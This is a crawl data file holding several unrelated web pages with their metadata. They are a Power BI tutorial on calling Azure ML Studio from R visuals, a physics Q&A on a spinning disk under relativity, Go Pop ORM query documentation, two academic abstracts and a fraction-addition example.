information and future prices. The timeseries component is pre-calculated from part two.\n\n## Using the example report\n\nFor this report to work in Power BI Desktop you need the packages AzureML and ggplot2 installed. If you have not previously used these packages on your computer, install them by going to your R console in R Studio or other R GUI and copy/paste install.packages(\"AzureML \"), and repeat that for “ggplot2”. If you are new to R, please see my previous post for installation instructions. Please note that AzureML uses networking services which are currently blocked in the Power BI service.\n\nWhen you open the example report and go to page 1 (Simple what-if analysis) you will see a line chart showing the historic revenue in the data model and the hypothetical revenue amount, based on the average discount and price elasticity parameters. Below the line chart you will find the breakdown of both amounts in a drillable matrix visualization.", null, "In the top right-hand side corner are the two parameters Average discount (applied across all products) and Price elasticity. By changing these two parameters you will see the other visualizations’ measures beginning with “new” updating. While these are straightforward relationships this can be powerful to allow the report’s users to develop an intuitive understanding for the underlying sensitivities. Especially when there is little prior knowledge about the variation in inputs but the relationships between the inputs and relevant KPIs are well understood and modeled.\n\nOn the second page, Azure ML Studio real-time scoring, we are not inputting any assumptions but instead using slicers and Power BI’s filter functions to dynamically select a subset of the data model to be sent to our Predictive ML Studio experiment.", null, "The three slicers are followed by the Rviz which plots the actual revenue and the model’s predicted value. To the right of it is a normal line chart showing the historical values only. Unlike the previous page where we had to estimate elasticity this model was trained on all available data and uses the price points of the six products (P1-P6) to predict what the revenue would be. However, we are limited to only using real data for the scoring.\n\nOn the third page (What-If Analysis with Azure ML Studio) we have combined the previous two pages using both input parameters and real-time scoring. This allows us to test different price points per product with the Azure ML experiment. Just as on the previous page there is no need to estimate elasticity since the model has learnt this relationship through the historic data and by adding parameters for marketing campaigns etc. we can now assess the probable range of any scenario of interest.", null, "To create a scenario, start by selecting the regions, stores and products that you are interested in using the corresponding slicers. Then select the time interval that you are interested in (this could have been exclusively or partially future dates). By changing the planned price on the different products, you can then examine which combination has the highest expected revenue or profit. This model takes cross-price elasticities into account, i.e. if one product is a complement or supplement to another product a change in its price will also affect units sold for the other product. In summary, a powerful tool to quickly compare the average Azure ML Studio prediction of the impact of your scenario against the base case.\n\n## PAGE 1\n\nTo build what-if like dynamic reports in Power BI start by creating the parameters that the user should be able to input by clicking Modelling -> New Parameter in Power BI Desktop top menu.", null, "This prompts a form that asks for the new parameter’s name, e.g. “Average discount”, data type, min and max values, the granularity of the steps that the slider should use and an optional default value. When you click OK a new table will be created with a calculated column and corresponding measure. The column contains the DAX formula that generates the series and you can double-click on it at any time to change the settings for the parameter. Repeat this for all the parameters that you want to let the user alter to define the scenario. For categorical values, e.g. “Social campaign”, “Display ads”, “Email” you can either Enter data or reference a new or existing table in the Query editor and then displaying it with a slicer. The what-if parameters should typically not be connected to any other tables, so you need to use DAX to use them. In this example I did this with the measure:\n\n`New Units_sold = SUM(Sales[Units_sold])*(1+[Average discount Value]*[Price eleasticity Value])`\n\nwhich changes the baseline quantity of products sold (Sales[Units_sold]) by the discount parameter, weighted by the elasticity. The measure:\n\n`New price = DIVIDE(SUM(Sales[Revenue]),SUM(Sales[Units_sold]))*(1-[Average discount Value])`\n\ncalculates the current average price and the applies the average discount in the scenario to it. We can then use these two calculations to determine the new revenue:\n\n`New revenue = [New price]*[New Units_sold]`\n\nand then by adding these measures to our visualizations the report is complete allowing the user to immediately see the results of their inputs. For stochastic modelling you can use a randomization function like RAND() or Poisson.Dist() to determine for instance the probability of achieving a target based on the parameter input.\n\nBelow is an example of this first page, embedded as a publish to web report:\n\n## PAGE 2\n\nTo create the R based visuals on page 2 & 3, you will need an ML Studio based experiment that is deployed and the AzureML and ggplot2 R packages installed. Please note that since the AzureML R package uses networking capabilities it is not yet available in the service, i.e. only works on-premise.\n\nThese two visualizations are Power BI R script visuals that uses the R packages AzureML and ggplot2*. The former connects to an MLStudio experiment. For it to do that the scoring experiment needs to be exhaustively defined. In this example we will use the 1) Workspace ID and 2) Experiment name. In addition, the package needs the 3) Authentication information to be allowed to interact with the web service.\n\nYou can find the Workspace ID by signing in to studio.azureml.net and selecting the correct workspace from the top menu:", null, "You then select the SETTINGS tab from the left-hand side menu. The WORKSPACE ID is the fourth property from the top:", null, "Copy this information, e.g. to Notepad.\n\nTo get the AUTHORIZATION TOKENS click on the second tab in settings:", null, "And copy one of the tokens to a new row in your Notepad.\n\nThe last thing that you need is the exact name of the predictive experiment. Once you have published it, you can get this by clicking on WEB SERVICES in the left-hand side menu and then on the name of the experiment in the list and you will see something like:", null, "Copy the entire name, e.g. “pricingdevpoc [predictive exp.]” to your Notepad.\n\nNow that you have the required connection information it is time to add the visuals to Power BI. Open a pbix file with the relevant data (typically a subset of the data that you used to train your model on). On the page that you want to add the interactive scoring: insert a simple standard visual, like a table and add the columns that you want to send to MLStudio. Please note that MLStudio requires an exact schema so the column names, sequence and type have to be identical to what the Web service input expects. I would also recommend that you click on the arrow next to each column name in the Values section for the visual and select Don’t summarize, to ensure that it looks correct without any empty rows or text values mixed with numbers etc.\n\nOnce this has been validated convert the visual to an R visual and add the below script updated with your experiments connection information:", null, "The R script editor where you past the script is visible when you select the converted Rviz from the canvas:", null, "Update the below script* with your connection details and paste it into the R script editor:\n\n`## Set the workspace id`\n\n`wsid = \"paste your workspace id here within the quotation marks\"`\n\n`## Set the workspace authentication key`\n\n`auth = \"paste your authentication token here within the quotation marks \"`\n\n`## Input the name of the Experiment`\n\n`serviceName = \"paste your service’s name here within the quotation marks \"`\n\n`## Load the AzureML library if not previously installed: install.packages(\"AzureML\")`\n\n`library(\"AzureML\")`\n\n`## Create a reference to the workspace`\n\n`ws <- workspace(wsid,auth)`\n\n`## Create a reference to the experiment`\n\n`s <- services(ws, name = serviceName)`\n\n`## Send the dataset to the Azure ML web service for scoring and store the result in ds`\n\n`ds <- consume(s,dataset)`\n\n`## Aggregate the scores to a single value by month`\n\n`scores <- data.frame(Prediction = tapply(ds\\$Scored.Labels, ds\\$Month_ID, sum))`\n\n`## Aggregate the revenue to a single value by month (for comparison)`\n\n`revenue <- data.frame(Actuals = tapply(ds\\$Revenue, ds\\$Month_ID, sum))`\n\n`## Combine the two resulting vectors in the new data.frame timePlot`\n\n`timePlot <- cbind(scores, revenue)`\n\n`## Load the ggplot library if not previously installed: install.packages(\"ggplot2\")`\n\n`require(ggplot2)`\n\n`## Specify the data to plot and set the x-axis`\n\n`ggplot(data = timePlot, aes(x = 1:nrow(timePlot))) +`\n\n`## Plot the two lines`\n\n`geom_line(aes(y = Prediction, colour = 'Prediction')) +`\n\n`geom_line(aes(y = Actuals, colour = 'Actuals')) +`\n\n`## Rename the x and y axis`\n\n`xlab(\"Time\") +`\n\n`ylab(\"Result \\$\") +`\n\n`## Name the legend`\n\n`labs(colour=\"Legend\") +`\n\n`## Change the colors of the line`\n\n`scale_color_manual(values = c(\"green\", \"red\"))`", null, "After pasting it in the editor, click the Run script play button. If you see an error message, click See details. If the message is “there is no package called…” install the required package, e.g. install.packages(\"AzureML\") from your IDE for R, (RGui, RStudio etc.).\n\nOnce you have gotten this visual to work you can move on to creating a similar visualization which takes user defined parameters as input. Please see the beginning of this section for information on creating What-If parameters.\n\n## PAGE 3\n\nDuplicate the page that you just created and substitute the columns from the data model with the corresponding parameter. If the parameters have the same names as the input schema it should work. In my example on page three I’ve given the parameters slightly different names to what the schema expects. This can be fixed by renaming them at runtime in the Rscript*. Below are two examples of how to do this, by name and by position:\n\n`## Rename the columns according to the import schema`\n\n`## By name`\n\n`names(dataset)[names(dataset)==\"Product1 Price Value\"] <- \"P1\"`\n\n`## By position`\n\n`names(dataset) <- \"P2\"`\n\n`names(dataset) <- \"P3\"`\n\n`names(dataset) <- \"P4\"`\n\n`names(dataset) <- \"P5\"`\n\n`## Set the workspace id`\n\n`wsid = \"paste your workspace id here within the quotation marks\"`\n\n`## Set the workspace authentication key`\n\n`auth = \"paste your authentication token here within the quotation marks \"`\n\n`## Input the name of the Experiment`\n\n`serviceName = \"paste your service’s name here within the quotation marks \"`\n\n`## Load the AzureML library if not previously installed: install.packages(\"AzureML\")`\n\n`library(\"AzureML\")`\n\n`## Create a reference to the workspace`\n\n`ws <- workspace(wsid,auth)`\n\n`## Create a reference to the experiment`\n\n`s <- services(ws, name = serviceName)`\n\n`## Send the dataset to the Azure ML web service for scoring and store the result in ds`\n\n`ds <- consume(s,dataset)`\n\n`## Aggregate the scores to a single value by month`\n\n`scores <- data.frame(Prediction = tapply(ds\\$Scored.Labels, ds\\$Month_ID, sum))`\n\n`## Aggregate the revenue to a single value by month (for comparison)`\n\n`revenue <- data.frame(Actuals = tapply(ds\\$Revenue, ds\\$Month_ID, sum))`\n\n`## Combine the two results vectors in the new data.frame timePlot`\n\n`timePlot <- cbind(scores, revenue)`\n\n`## Load the ggplot library if not previously installed: install.packages(\"ggplot2\")`\n\n`require(ggplot2)`\n\n`labelNudge <- (max(scores) - min(scores))/15`\n\n`## Specify the data to plot and set the x-axis`\n\n`ggplot(data = timePlot, aes(x = 1:nrow(timePlot))) +`\n\n`## Plot the two lines`\n\n`geom_line(aes(y = Prediction, colour = 'Prediction')) +`\n\n`geom_line(aes(y = Actuals, colour = 'Base case')) +`\n\n`## Rename the x and y axis`\n\n`xlab(\"Time\") +`\n\n`ylab(\"Result \\$\") +`\n\n`## Name the legend`\n\n`labs(colour=\"Legend\") +`\n\n`## Change the colors of the lines`\n\n`scale_color_manual(values = c(\"blue\", \"red\")) +`\n\n`geom_text(aes(label = format(round(Prediction, digits = 0), big.mark = \",\", big.interval = 3L), y=Prediction), nudge_y = labelNudge)`\n\nThe other difference to the first Rscript are small layout changes." ]
[ null, "https://secure.gravatar.com/avatar/c7f5c28f7cbdff00f0ba15af49d4a3d1", null, "https://powerbicdn.azureedge.net/mediahandler/blog/media/PowerBI/blog/b6f9490e-1d21-435f-bb31-0386924dbfbd.jpg", null, "https://powerbicdn.azureedge.net/mediahandler/blog/media/PowerBI/blog/2c49f87d-8ba9-4e9c-b34d-ec66d943ca51.jpg", null, "https://powerbicdn.azureedge.net/mediahandler/blog/media/PowerBI/blog/dae4798f-398a-45e0-b4b1-855816f26450.jpg", null, "https://powerbicdn.azureedge.net/mediahandler/blog/media/PowerBI/blog/53d886e7-07dd-4cd8-b8a8-51e22d338167.png", null, "https://powerbicdn.azureedge.net/mediahandler/blog/media/PowerBI/blog/de66d455-865f-4721-a213-1d51346908c3.png", null, "https://powerbicdn.azureedge.net/mediahandler/blog/media/PowerBI/blog/c7a3ab71-4323-4b04-b6ff-cc4e82e22e72.png", null, "https://powerbicdn.azureedge.net/mediahandler/blog/media/PowerBI/blog/78283764-5196-434a-ad7b-4a5904212c56.png", null, "https://powerbicdn.azureedge.net/mediahandler/blog/media/PowerBI/blog/8a4f5052-01db-4087-bd6d-0c6962aa6a34.png", null, "https://powerbicdn.azureedge.net/mediahandler/blog/media/PowerBI/blog/29700d6e-8895-4728-8d06-a1bd91c6b705.png", null, "https://powerbicdn.azureedge.net/mediahandler/blog/media/PowerBI/blog/1f489236-b942-4f29-b7ee-aa1522ba3315.png", null, "https://powerbicdn.azureedge.net/mediahandler/blog/media/PowerBI/blog/c12e7699-9cef-4a28-a824-5a8ff7b39b6e.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.84119636,"math_prob":0.7852542,"size":14972,"snap":"2019-13-2019-22","text_gpt3_token_len":3194,"char_repetition_ratio":0.1169829,"word_repetition_ratio":0.17812759,"special_character_ratio":0.21566924,"punctuation_ratio":0.0805069,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97052324,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-03-24T23:42:57Z\",\"WARC-Record-ID\":\"<urn:uuid:74fecd88-3a66-4905-a49e-e022e4212d00>\",\"Content-Length\":\"95916\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f3c8dede-a4f8-4c51-91f3-e4b70c71aa54>\",\"WARC-Concurrent-To\":\"<urn:uuid:e1421a82-507c-4988-839b-3d127bc468ba>\",\"WARC-IP-Address\":\"40.76.218.33\",\"WARC-Target-URI\":\"https://powerbi.microsoft.com/tr-tr/blog/visualizing-and-interacting-with-your-azure-machine-learning-studio-experiments/\",\"WARC-Payload-Digest\":\"sha1:7I2ZESHXYIHC3VN3MVRYZLKVDHBJEN6N\",\"WARC-Block-Digest\":\"sha1:7JU7P7TE2IF3ZO6PGZF6XWFA2JHQB5T3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-13/CC-MAIN-2019-13_segments_1552912203529.38_warc_CC-MAIN-20190324230359-20190325012359-00054.warc.gz\"}"}
https://van.physics.illinois.edu/qa/listing.php?id=1380
[ "# Q & A: relativistic merry-go-round\n\nQ:\nI’m not sure if you received this question. A ring has cirumfurance = diameter * 3.14. Now, if this ring, layed flat atop a smooth surface, rotates with linear speed close to the speed of light, its cirumfurance shrinks to close to zero. However, since there is no motion in the diametric direction, its diameter remains unchanged. How could a ring, on a flat surface, have cirumfurance less than diameter * 3.14 ? To better visualize this situation, we can start by drawing a circle on the surface right below the ring before the rotation starts. Now the question becomes: How could the rotating ring have the same diameter as the circle but less circumfurance?\n- Mehran (age 53)\nLisle, Illinois\nA:\nMehran- This is a familiar example, used by Einstein to help introduce General Relativity. Let's look at this rotating disk from two points of view- the point of view of some standing on the ground and that of someone on the disk. We'll assume that the geometry from the ground point of view has all the normal geometrical properties that we're used to. Now if by 'circumference' we mean the length that the ground observer traces out in the dirt directly below the rim of the spinning disk, it is obviously pi* diameter, where diameter is the distance across that circle. You may wonder how that can be since the moving parts of the disk are Lorentz contracted, but there are all sorts of other stresses etc in a spinning disk, so it stretches some, and we simply know that Euclid's geometry works well to describe any figures under ordinary circumstances in our standard frames. Remember, we don't have to worry anout how fast the disk is spinning because we're making measurements on the part of the ground that almost touches the disk.\n\nNow how do things look for someone making measurements on the disk? As you say, if he measures the diameter by laying out meter sticks in a standard way, he'll get the same length as we get, because those meter sticks are not moving lengthwise with respect to us and hence are not Lorentz contracted lengthwise. However, the meter sticks used to measure the circumference, along the rim, ARE Lorentz contracted, so it takes MORE than pi*diameter of them to cover the rim. So unless you were to for some reason pick a different, longer, path to measure the dimeter, you end up with the circumference/diameter ration being MORE than pi in the frame of the spinning disk. Of course, you might choose some other path, like that followed by a light ray, and get a longer diameter.\n\nSo the answer is that if you pick odd frames like that of the disk, with different parts accelerating different ways, you can't use the standard Euclidean geometry of space-time. The weird thing is that if gravity is present, it mimics non-uniform acceleration. So, strictly speaking, the simple frames we started with don't exist, but the world can come close to behaving that way. For the Earth, the circumference is short of what we would expect for Euclidean geometry by only about an inch.\n\nMike W.\n\nThe observer on the rim of the disk can get a different answer depending on how the circumference of the disk is measured. If the whirling observer on a disk whose rim is traveling close to the speed of light observes how fast the dirt is going by underneath, using his own meter stick and clock, he will get the answer that he is going at close to the speed of light. If he measures the time on his clock it takes to make one revolution (by looking at a mark in the dirt, say), and he multiplies that by his speed, he will get an answer that is less than pi*diameter. This is a weird quantity because it is not measured in a single frame of refernce. The whirling observer accelerates constantly, and this is the sum of lots of little pieces measured in a succession of uniformly moving frames of reference.\n\nThis situation has practical consequences. Storing a large number of bunches of charged particles in a circular storage ring and then accelerating them to high energies involves this effect. Typically, the rings of magnets in a modern synchrotron are fixed in radius and the radio-frequency cavities are fixed in frequency and their spacing. The charged particles travel at nearly the speed of light all the time, so their travel times do not change much as the energy is raised from immense to really immense. Nor does the spacing of the bunches around the ring. What changes though, is that in one moving bunch's frame, the neighboring bunches get farther apart as the energy is increased. This has an effect on the electrostatic force one bunch exerts on another as the energy increases (they go down. Real accelerators have more troubles with residual electromagnetic fields oscillating in the metal beampipe). In the frame of one of the bunches, the distance to the next has increased, but the same number of bunches stay equally spaced around the ring, so the whirling observer thinks the circumference has increased. But, paradoxically, it takes less of his time to go around that circle at approximately the same speed. (this is observed when putting particles with known lifetimes, such as muons, into these storage rings -- they make more turns around the ring on average before decaying).\n\nTom\n\n(published on 10/22/2007)" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9340879,"math_prob":0.9561232,"size":4557,"snap":"2021-43-2021-49","text_gpt3_token_len":1030,"char_repetition_ratio":0.113551505,"word_repetition_ratio":0.002528445,"special_character_ratio":0.19991222,"punctuation_ratio":0.08656036,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.965725,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-03T07:40:30Z\",\"WARC-Record-ID\":\"<urn:uuid:bb2dc0b9-22a2-4316-bb47-1bd27c2d7cbb>\",\"Content-Length\":\"32991\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:055344c2-1d3a-4d04-b79b-123d9a4ffa2e>\",\"WARC-Concurrent-To\":\"<urn:uuid:ce9425ed-b861-4251-b14d-bfd7d83401c3>\",\"WARC-IP-Address\":\"130.126.151.39\",\"WARC-Target-URI\":\"https://van.physics.illinois.edu/qa/listing.php?id=1380\",\"WARC-Payload-Digest\":\"sha1:OATMFG4Y6JAWMOUBMW74BJGGLPVF7HVY\",\"WARC-Block-Digest\":\"sha1:D7F5VDXWQFPMYUAGIRFJWZBJTTYERKCT\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964362605.52_warc_CC-MAIN-20211203060849-20211203090849-00390.warc.gz\"}"}
https://gobuffalo.io/en/docs/db/querying
[ "# Querying\n\nIn this chapter, you'll learn how to retrieve data from your database using Pop.\n\n### Find By ID\n\n```user := User{}\nerr := db.Find(&user, id)\n```\n\n### Find All\n\n```users := []User{}\nerr := db.All(&users)\nerr = db.Where(\"id in (?)\", 1, 2, 3).All(&users)\n```\n\n### Find All with Order\n\n```// To retrieve records from the database in a specific order, you can use the Order method\nusers := []User{}\nerr := db.Order(\"id desc\").All(&users)\n```\n\n#### Find Last\n\n```// Last() orders by created_at\nuser := models.User{}\nerr := tx.Last(&user)\n```\n\n### Find Where\n\n```users := []models.User{}\nquery := db.Where(\"id = 1\").Where(\"name = 'Mark'\")\nerr := query.All(&users)\n\nerr = tx.Where(\"id in (?)\", 1, 2, 3).All(&users)\n```\n\n#### Using `in` Queries\n\n```err = db.Where(\"id in (?)\", 1, 2, 3).All(&users)\nerr = db.Where(\"id in (?)\", 1, 2, 3).Where(\"foo = ?\", \"bar\").All(&users)\n```\n\nUnfortunately, for a variety of reasons you can't use an `and` query in the same `Where` call as an `in` query.\n\n```// does not work:\nerr = db.Where(\"id in (?) and foo = ?\", 1, 2, 3, \"bar\").All(&users)\n// works:\nerr = db.Where(\"id in (?)\", 1, 2, 3).Where(\"foo = ?\", \"bar\").All(&users)\n```\n\n### Select specific columns\n\n`Select` allows you to load specific columns from a table. Useful when you don't want all columns from a table to be loaded in a query.\n\n```err = db.Select(\"name\").All(&users)\n// SELECT name FROM users\n\nerr = db.Select(\"max(age)\").All(&users)\n// SELECT max(age) FROM users\n\nerr = db.Select(\"age\", \"name\").All(&users)\n// SELECT age, name FROM users\n```\n\n### Join Query\n\n```// page: page number\n// perpage: limit\nroles := []models.UserRole{}\nquery := models.DB.LeftJoin(\"roles\", \"roles.id=user_roles.role_id\").\nLeftJoin(\"users u\", \"u.id=user_roles.user_id\").\nWhere(`roles.name like ?`, name).Paginate(page, perpage)\n\ncount, _ := query.Count(models.UserRole{})\ncount, _ := query.CountByField(models.UserRole{}, \"*\")\nsql, args := query.ToSQL(&pop.Model{Value: models.UserRole{}}, \"user_roles.*\",\n\"roles.name as role_name\", \"u.first_name\", \"u.last_name\")\nerr := models.DB.RawQuery(sql, args...).All(&roles)\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5923553,"math_prob":0.7450917,"size":2137,"snap":"2021-43-2021-49","text_gpt3_token_len":619,"char_repetition_ratio":0.16174403,"word_repetition_ratio":0.08143322,"special_character_ratio":0.34066448,"punctuation_ratio":0.2784553,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98346853,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-25T03:48:15Z\",\"WARC-Record-ID\":\"<urn:uuid:37b150f3-c92b-41f4-92b8-2c2038d73410>\",\"Content-Length\":\"23897\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:99f19937-63cd-427d-ac61-48dd2887978e>\",\"WARC-Concurrent-To\":\"<urn:uuid:a7f75dc2-0d23-4160-b63c-793ac6f6f3ff>\",\"WARC-IP-Address\":\"52.204.242.176\",\"WARC-Target-URI\":\"https://gobuffalo.io/en/docs/db/querying\",\"WARC-Payload-Digest\":\"sha1:7WOURQOXZ2TQNRU3EZQMXMAQ5EQM4URI\",\"WARC-Block-Digest\":\"sha1:HCRVTYCTLEXJN5GRZ4YD6QY2YIGZVX67\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323587623.1_warc_CC-MAIN-20211025030510-20211025060510-00057.warc.gz\"}"}
https://virtual.aistats.org/virtual/2021/poster/1845
[ "## Power of Hints for Online Learning with Movement Costs\n\n### Aditya Bhaskara · Ashok Cutkosky · Ravi Kumar · Manish Purohit\n\nKeywords: [ Online Learning ] [ Learning Theory and Statistics ]\n\nAbstract: We consider the online linear optimization problem with movement costs, a variant of online learning in which the learner must not only respond to cost vectors $c_t$ with points $x_t$ in order to maintain low regret, but is also penalized for movement by an additional cost $\\|x_t-x_{t+1}\\|^{1+\\epsilon}$ for some $\\epsilon>0$. Classically, simple algorithms that obtain the optimal $\\sqrt{T}$ regret already are very stable and do not incur a significant movement cost. However, recent work has shown that when the learning algorithm is provided with weak hint'' vectors that have a positive correlation with the costs, the regret can be significantly improved to $\\log(T)$. In this work, we study the stability of such algorithms, and provide matching upper and lower bounds showing that incorporating movement costs results in intricate tradeoffs between $\\log(T)$ when $\\epsilon\\ge 1$ and $\\sqrt{T}$ regret when $\\epsilon=0$." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.91293025,"math_prob":0.9918769,"size":941,"snap":"2022-05-2022-21","text_gpt3_token_len":201,"char_repetition_ratio":0.113127,"word_repetition_ratio":0.0,"special_character_ratio":0.22848034,"punctuation_ratio":0.07317073,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.993264,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-22T02:09:55Z\",\"WARC-Record-ID\":\"<urn:uuid:b678d771-75e2-4a5d-b72c-8d13d5bdfcfe>\",\"Content-Length\":\"11311\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:944b2227-08b0-4114-8b90-c4e58b6ce7e8>\",\"WARC-Concurrent-To\":\"<urn:uuid:9ff2f17d-a84b-4a74-b4f6-231701c5582a>\",\"WARC-IP-Address\":\"198.202.70.65\",\"WARC-Target-URI\":\"https://virtual.aistats.org/virtual/2021/poster/1845\",\"WARC-Payload-Digest\":\"sha1:JQHMBNKCSQQHXYYYVJPLJBC63WEB5VTK\",\"WARC-Block-Digest\":\"sha1:74ODAAY2XDF65Q26UKWAOGHKSNM4QPRE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662543264.49_warc_CC-MAIN-20220522001016-20220522031016-00049.warc.gz\"}"}
https://answers.everydaycalculation.com/add-fractions/9-4-plus-8-9
[ "Solutions by everydaycalculation.com\n\n1st number: 2 1/4, 2nd number: 8/9\n\n9/4 + 8/9 is 113/36.\n\n1. Find the least common denominator or LCM of the two denominators:\nLCM of 4 and 9 is 36\n\nNext, find the equivalent fraction of both fractional numbers with denominator 36\n2. For the 1st fraction, since 4 × 9 = 36,\n9/4 = 9 × 9/4 × 9 = 81/36\n3. Likewise, for the 2nd fraction, since 9 × 4 = 36,\n8/9 = 8 × 4/9 × 4 = 32/36\n4. Add the two like fractions:\n81/36 + 32/36 = 81 + 32/36 = 113/36\n5. So, 9/4 + 8/9 = 113/36\nIn mixed form: 35/36\n\nMathStep (Works offline)", null, "Download our mobile app and learn to work with fractions in your own time:" ]
[ null, "https://answers.everydaycalculation.com/mathstep-app-icon.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6965826,"math_prob":0.9993949,"size":395,"snap":"2022-40-2023-06","text_gpt3_token_len":206,"char_repetition_ratio":0.19948849,"word_repetition_ratio":0.0,"special_character_ratio":0.5443038,"punctuation_ratio":0.06896552,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99862564,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-02-06T08:53:37Z\",\"WARC-Record-ID\":\"<urn:uuid:8c9c916d-05f5-48f8-917a-a63f71d9e33e>\",\"Content-Length\":\"8589\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:daddf5e0-e514-4e27-822c-0366712c3b35>\",\"WARC-Concurrent-To\":\"<urn:uuid:18b79df9-f47c-4cca-beaf-97c4df8b9612>\",\"WARC-IP-Address\":\"96.126.107.130\",\"WARC-Target-URI\":\"https://answers.everydaycalculation.com/add-fractions/9-4-plus-8-9\",\"WARC-Payload-Digest\":\"sha1:AMALIHKGA4YKW7M2X6BXFUQSV267472N\",\"WARC-Block-Digest\":\"sha1:AJFAO6PON3R64MEMNLDH5W6WQLFM6EIY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764500334.35_warc_CC-MAIN-20230206082428-20230206112428-00437.warc.gz\"}"}
https://gas-dd.sagepub.com/lp/springer-journals/a-solution-to-parabolic-system-with-the-fractional-laplacian-rVAx5SW0yM
[ "# A solution to parabolic system with the fractional Laplacian\n\nA solution to parabolic system with the fractional Laplacian The existence of a solution to the parabolic system with the fractional Laplacian (−Δ) α/2, α > 0 is proven, this solution decays at different rates along different time sequences going to infinity. As an application, the existence of a solution to the generalized Navier-Stokes equations is proven, which decays at different rates along different time sequences going to infinity. The generalized Navier-Stokes equations are the equations resulting from replacing −Δ in the Navier-Stokes equations by (−Δ) m , m > 0. At last, a similar result for 3-D incompressible anisotropic Navier-Stokes system is obtained. http://www.deepdyve.com/assets/images/DeepDyve-Logo-lg.png Applied Mathematics-A Journal of Chinese Universities Springer Journals\n\n# A solution to parabolic system with the fractional Laplacian\n\n, Volume 24 (2) – Jun 10, 2009\n7 pages", null, "", null, "", null, "", null, "", null, "", null, "/lp/springer-journals/a-solution-to-parabolic-system-with-the-fractional-laplacian-rVAx5SW0yM\nPublisher\nSpringer Journals\nCopyright © 2009 by Editorial Committee of Applied Mathematics-A Journal of Chinese Universities and Springer-Verlag GmbH\nSubject\nMathematics; Applications of Mathematics; Mathematics, general\nISSN\n1005-1031\neISSN\n1993-0445\nDOI\n10.1007/s11766-009-2084-5\nPublisher site\nSee Article on Publisher Site\n\n### Abstract\n\nThe existence of a solution to the parabolic system with the fractional Laplacian (−Δ) α/2, α > 0 is proven, this solution decays at different rates along different time sequences going to infinity. As an application, the existence of a solution to the generalized Navier-Stokes equations is proven, which decays at different rates along different time sequences going to infinity. The generalized Navier-Stokes equations are the equations resulting from replacing −Δ in the Navier-Stokes equations by (−Δ) m , m > 0. At last, a similar result for 3-D incompressible anisotropic Navier-Stokes system is obtained.\n\n### Journal\n\nApplied Mathematics-A Journal of Chinese UniversitiesSpringer Journals\n\nPublished: Jun 10, 2009\n\nAccess the full text." ]
[ null, "https://docs4.deepdyve.com/doc_repo_server/get-image/rVAx5SW0yM/1/1", null, "https://docs4.deepdyve.com/doc_repo_server/get-image/rVAx5SW0yM/1/2", null, "https://docs4.deepdyve.com/doc_repo_server/get-image/rVAx5SW0yM/1/3", null, "https://docs4.deepdyve.com/doc_repo_server/get-image/rVAx5SW0yM/1/4", null, "https://gas-dd.sagepub.com/assets/images/doccover.png", null, "https://gas-dd.sagepub.com/assets/images/doccover.png", null ]
